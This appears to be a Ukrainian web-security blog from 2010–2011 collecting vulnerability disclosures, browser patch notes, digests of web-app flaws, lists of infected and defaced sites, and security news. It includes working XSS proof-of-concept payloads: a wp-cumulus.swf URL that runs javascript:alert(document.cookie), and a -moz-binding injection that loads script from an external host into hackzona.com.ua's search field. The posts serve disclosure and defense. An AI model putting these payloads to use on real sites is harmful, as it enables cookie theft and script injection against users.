Websecurity - Веб безпека

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах WP Forum та Mingle Forum. Для котрих з’явилися експлоіти. WP Forum - це плагін для стоворення форуму, Mingle Forum - це ще один плагін для стоворення форуму.

• SQL Injection in WP Forum wordpress plugin (деталі)
• Path disclosure in Mingle Forum wordpress plugin (деталі)
• XSS in Mingle Forum wordpress plugin (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

У січні, 27.01.2011, через місяць після виходу Opera 11, вийшла Opera 11.01.

Нова версія Opera є оновленням, що покращує безпеку та стабільність браузера.

Серед виправлень безпеки в Opera 11.01:

• Removed support for “javascript:” URLs in CSS -o-link values, to make it easier for sites to filter untrusted CSS.
• Fixed an issue where large form inputs could allow execution of arbitrary code.
• Fixed an issue which made it possible to carry out clickjacking attacks against internal opera: URLs.
• Fixed issues which allowed web pages to gain limited access to files on the user’s computer.
• Fixed an issue where email passwords were not immediately deleted when deleting private data.
• Fixed an issue which could cause the wrong executable to be used to display a downloaded file in its folder.
• А також виправлена велика кількість вибивань браузера.

По матеріалам http://www.opera.com.

В даній добірці уразливості в веб додатках:

• XSS vulnerability in BlogBird platform (деталі)
• Information disclosure in BloofoxCMS (деталі)
• RSA, The Security Division of EMC, announces a fix for potential security vulnerability in RSAR Federated Identity Manager (деталі)
• Information disclosure in BloofoxCMS (деталі)
• LFI in Novaboard (деталі)
• SAP NetWaver SLD - multiple XSS (деталі)
• SAP Netweaver wsnavigator XSS Security Vulnerability (деталі)
• SAP J2EE Web Services Navigator Cross-Site Scripting (деталі)
• LFI in DZCP (деталі)
• Path disclosure in MyBB (деталі)

Раніше я вже писав про уразливість в Cumulus для Drupal. Така ж уразливість є і в плагіні sfWpCumulusPlugin для symfony, що використовує tagcloud.swf розроблений автором WP-Cumulus. Про мільйони флешек tagcloud.swf вразливих до XSS атак я згадував у своїй статті XSS уразливості в 34 мільйонах флеш файлах.

Сьогодні я знайшов Cross-Site Scripting уразливість в sfWpCumulusPlugin для symfony. Про що найближчим часом повідомлю розробнику.

XSS:

http://site/sfWpCumulusPlugin/swf/wp-cumulus.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

Код виконається при кліку. Це Strictly social XSS. Також можна провести HTML Injection атаку, подібно до WP-Cumulus.

Уразливі всі версії sfWpCumulusPlugin.

Після попереднього дослідження інфікованих сайтів, приведу нову інформацію про заражені сайти. З числа українських сайтів.

• http://strongsoft.com.ua - інфекція була виявлена 04.03.2011. Зараз сайт не входить до переліку підозрілих.
• http://mylink.com.ua - інфекція була виявлена 01.03.2011. Зараз сайт входить до переліку підозрілих.
• http://zarabotalo.at.ua - інфекція була виявлена 29.01.2011. Зараз сайт не входить до переліку підозрілих.
• http://almandry.com.ua - інфекція була виявлена 04.03.2011. Зараз сайт входить до переліку підозрілих.
• http://areasoft.com.ua - інфекція була виявлена 24.02.2011. Зараз сайт не входить до переліку підозрілих.

Як і у випадку з іншими веб сайтами, інфіковані сайти mylink.com.ua та almandry.com.ua також хостить в себе Укртелеком.

Виявлена можливість обходу аутентифікації в Postgres Plus SQL.

Уразливі продукти: Postgres Plus SQL.

Несанкціонований доступ до DBA Management Server (TCP/9000, TCP/9363).

• PostgreSQL Plus Advanced Server DBA Management Server Remote Authentication Bypass Vulnerability (деталі)

25.10.2010

У березні, 21.03.2010, я знайшов Insufficient Anti-automation та Cross-Site Scripting уразливості на секюріті проекті http://hackzona.com.ua. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше.

14.03.2011

Insufficient Anti-automation:

http://hackzona.com.ua/hz.php?name=Feedback
http://hackzona.com.ua/hz.php?name=NLbook

В даних формах немає захисту від автоматизованих запитів (капчі).

XSS:

POST запит на сторінці http://hackzona.com.ua/hz.php?name=Search

" style="-moz-binding:url('http://websecurity.com.ua/webtools/xss.xml#xss')

В полі пошуку.

Дані уразливості вже виправлені.

У жовтні місяці відбувся масовий взлом сайтів на сервері Garant-Park-Telecom. Це російський хостер, але багато сайтів з України. Нещодавно я вже розповідав про інші масові взломи.

Був взломаний сервер російської компанії Garant-Park-Telecom. Взлом відбувся після згаданого масового взлому сайтів на сервері Freehost.

Всього було взломано 246 сайтів, з них 218 українських сайтів на сервері Garant-Park-Telecom (IP 89.111.170.128). Це наступні сайти: cayman.raskone.silver.biz.ua, convictus.kiev.ua, convictus.com.ua, chuguy.make.silver.biz.ua, doshkilnyatko.com.ua, elistom.frcbc.silver.biz.ua, carpeta.com.ua, cargogruzcom.leon49.silver.biz.ua, bypillsn.silver.biz.ua, biotech-system.make.silver.biz.ua, bimboka.dp.ua, grafskates.silver.biz.ua, imw.com.ua, duschy.com.ua, cult.sk.silver.biz.ua, green-wheel.com.ua, homeopat.dp.ua, gabro.com.ua, edoctor.com.ua, live.toni.silver.biz.ua, online.roman2.silver.biz.ua, apkservice.com.ua, andariys.monument.com.ua, adv-dva.sk.silver.biz.ua, abdomed.com.ua, acg.com.ua, kamerton.in.ua, 4dkino-com.koreyko.silver.biz.ua, manzuk.silver.biz.ua, lemonchic.com.ua, nika.dn.ua, andriy2.silver.biz.ua, dj.vadimzp2.silver.biz.ua, alexroll.silver.biz.ua, bankomat.convictus.org.ua, baz.kiev.ua, bazoka.silver.biz.ua, newrealtor.contur.net.ua, carpeta.ua, churchan.silver.biz.ua, climate.lviv.ua, contur.org.ua, contur.net.ua, com.victorcg.silver.biz.ua, conturorg.contur.net.ua, convictusnet.convictus.org.ua, convictus.org.ua, dnepr-co-ua.koreyko.silver.biz.ua, digestin.com.ua, dizel.silver.biz.ua, dmitriys.silver.biz.ua, dom.silver.biz.ua, domomania.contur.net.ua, domus.biz.ua, doshkilnyatko.contur.net.ua, dti.com.ua, eflet.silver.biz.ua, edoctor.webvideo.com.ua, eflet2.silver.biz.ua, o-hutorok.lnxd.silver.biz.ua, elistom.com.ua, psytron.com.ua, eugenevi.silver.biz.ua, etalon.uz.ua, eye.poltava.ua, fiat-lux.com.ua, forsale.co.ua, forofis.com.ua, lifeinmo.silver.biz.ua, roman2.silver.biz.ua, forsale.lviv.ua, frcbc.silver.biz.ua, geo-vision.com.ua, gbyte.silver.biz.ua, gindia.silver.biz.ua, gotovimvodu.com.ua, group.irochkon.silver.biz.ua, ibanez.silver.biz.ua, gts.org.ua, imwuser1.lnxd.silver.biz.ua, inlanger2.silver.biz.ua, iyt.com.ua, ivanushk.silver.biz.ua, iyt.yachtcharter.com.ua, sk.silver.biz.ua, sonyashnik.kiev.ua, nazard.silver.biz.ua, statusatm.com.ua, stroy.irochkon.silver.biz.ua, shlyah.contur.net.ua, td-himinvest.com.ua, irochkon.silver.biz.ua, kg-dp-ua.koreyko.silver.biz.ua, konstantin.avsz.silver.biz.ua, koreyko.silver.biz.ua, toni.silver.biz.ua, laminatparket.contur.net.ua, leon49.silver.biz.ua, letmesee.sk.silver.biz.ua, ttholod.com.ua, live.roman2.silver.biz.ua, lnxd.silver.biz.ua, main.victorcg.silver.biz.ua, makintosh.ks.ua, make.silver.biz.ua, maks-tour.com.ua, test1.nika.dn.ua, test.nika.dn.ua, ustav.silver.biz.ua, masterprint.com.ua, teploagent.com.ua, usedboats.com.ua, monument.com.ua, mykolaivka-rada.nika.dn.ua, montessori.org.ua, nacional.contur.net.ua, net.victorcg.silver.biz.ua, newboats.com.ua, newboats.yachtcharter.com.ua, newborn.silver.biz.ua, newrealtor.com.ua, vika.vadimzp2.silver.biz.ua, npoenergy.com.ua, olside.silver.biz.ua, orfey.acg.com.ua, orfey.com.ua, yachtmarina.yachtcharter.com.ua, parketmaster.com.ua, ozerniyhutorok.lnxd.silver.biz.ua, patmari.odessa.ua, pelmen.silver.biz.ua, pavlo.com.ua, pavlo.webvideo.com.ua, plantro.com.ua, polorsade.raskone.silver.biz.ua, prestige-life.com.ua, privatblog.vadimzp2.silver.biz.ua, pumping.com.ua, raskoua.raskone.silver.biz.ua, rasko.ua, raskone.silver.biz.ua, reebok.silver.biz.ua, resume.co.ua, retriver.net.ua, review.vadimzp2.silver.biz.ua, retion.silver.biz.ua, robingood.contur.net.ua, robingood.com.ua, rudi.dizel.silver.biz.ua, snooker.in.ua, snooker.contur.net.ua, startinukraine.webvideo.com.ua, stas.standov.silver.biz.ua, artfresh.silver.biz.ua, standov.silver.biz.ua, suvenirtr.silver.biz.ua, sunnyart.make.silver.biz.ua, ticketcom.acg.com.ua, tofs.roman2.silver.biz.ua, asu.silver.biz.ua, ukrfer.silver.biz.ua, unberto2.silver.biz.ua, usedboats.yachtcharter.com.ua, vadimzp.silver.biz.ua, vadimzp2.silver.biz.ua, venol-oil.silver.biz.ua, venol.com.ua, victorcg.silver.biz.ua, vitakor.silver.biz.ua, vitohaus.silver.biz.ua, august.silver.biz.ua, art-rcom.contur.net.ua, www1.elistom.com.ua, yachtmarina.com.ua, yachtcharter.com.ua, zdorovka.lnxd.silver.biz.ua, zoj.com.ua, avtoguru.contur.net.ua, artgallery.contur.net.ua, ask-complex.ask-complex.com.ua, arm-dp-ua.koreyko.silver.biz.ua, aquaritm.koreyko.silver.biz.ua, ask-complex.kiev.ua, audioline.com.ua, aviasvit.olside.silver.biz.ua, avsz.silver.biz.ua, avsn.avsz.silver.biz.ua, artland4you.videoxxi.silver.biz.ua, apkservicecomua.lnxd.silver.biz.ua, avtey.com.ua, www-promin-info.make.silver.biz.ua, garden-ua.com, skulptura-granit-mramor.monument.com.ua, art-r.com.ua, sculpture-granit-mramor.monument.com.ua, aspi.in.ua, pottery-park.koreyko.silver.biz.ua, artgallery.in.ua, provodov-net-ua.koreyko.silver.biz.ua, ask-complex.com.ua, nord-1-dp-ua.koreyko.silver.biz.ua, yonex.com.ua, fast-start-crimea-ua.make.silver.biz.ua, suvenir.com.ua, cinematix4d-com.koreyko.silver.biz.ua, turboam.com.ua, cinematix-org.koreyko.silver.silver.biz.ua, tess.in.ua, tess.contur.net.ua, alant-biz-ua.koreyko.silver.biz.ua, akalaboratory-dp-ua.koreyko.silver.biz.ua, synergos.com.ua, alina-karina-com.koreyko.silver.biz.ua, sgifts.com.ua, master-biz-ua.koreyko.silver.biz.ua, silver.biz.ua, foreign-realestate.koreyko.silver.biz.ua, www.slavuta-mvk.gov.ua. Серед них український державний сайт www.slavuta-mvk.gov.ua (дуже дивно бачити gov.ua сайт, що хоститься в іншій державі - всі державні сайти повинні хоститися у власній державі).

Всі сайти були взломані 12 жовтня 2010 року. Дефейси 217 (245) сайтів проведено хакером GHoST61 і 1 сайта хакером з By_aGReSiF.

Враховуючи велику кількість сайтів на одному сервері та короткий проміжок часу для дефейсу всіх цих сайтів, немає сумнівів, що вони були взломані через взлом серверу хостінг провайдера. Коли через взлом одного сайта, був отриманий root доступ до сервера (через уразливості в програмному забезпеченні самого сервера) та атаковані інші сайти на даному сервері.

За повідомленням hackzona.com.ua, новий варіант Zeus атакує клієнтів банків через перехоплення SMS-повідомлень.

Гучний банківський троян Zeus повертається до користувачів в новому образі - Mitmo. Нова версія Zeus націлена на призначені для користувача стільникові телефони, перехоплюючи SMS-повідомлення від банківських сервісів і користувачів, і сподіваючись перехопити банківські реквізити або логіни / паролі для систем доступу до онлайн-банкінгу. Очевидно, що даний крок хакерів спрямований на обхід систем двофакторної аутентифікації, які за останній час банки почали активно розгортати.

За повідомленням www.xakep.ru, ФБР заарештувала хакерів за витік даних про користувачів iPad.

Два дослідники систем безпеки були арештовані в справі, пов’язаній з витоком інформації, що піддала ризику більш 100000 користувачів iPad.

Федеральне Бюро Розслідувань США сказали, що заарештували дослідників системи безпеки компанії Goatse Security Ендрю Орнхаймера і Деніела Шпітлера за їхні ролі у витоку користувацької бази даних AT&T, що відбулася в червні 2010 року.

За повідомленням www.3dnews.ru, на WordPress зроблена масштабна DDoS-атака.

На початку березня найбільша у світі платформа для ведення блогів WordPress (wordpress.com) піддалася найбільш масованій в історії DDoS-атаці, у результаті чого безліч блогів стали недоступні.

Відповідно до повідомлення материнської компанії Automattic, під час атаки на сервери посилалося по декілька мільйонів пакетів інформації в секунду.

В даній добірці уразливості в веб додатках:

• Novell Groupwise WebAccess Multiple Cross-Site Scripting Vulnerabilities (деталі)
• Novell Netware Groupwise Internet Gateway Remote Code Execution Vulnerability (деталі)
• SQL injection in Energine (деталі)
• Stored XSS vulnerability in Zomplog (деталі)
• Novell Groupwise Internet Agent Stack Overflow (деталі)
• Novell Groupwise Webaccess Stack Overflow (деталі)
• XSS vulnerability in Zomplog (деталі)
• XSRF (CSRF) in Zomplog (деталі)
• Cisco Security Advisory: CDS Internet Streamer: Web Server Directory Traversal Vulnerability (деталі)
• XSS vulnerability in BlogBird platform (деталі)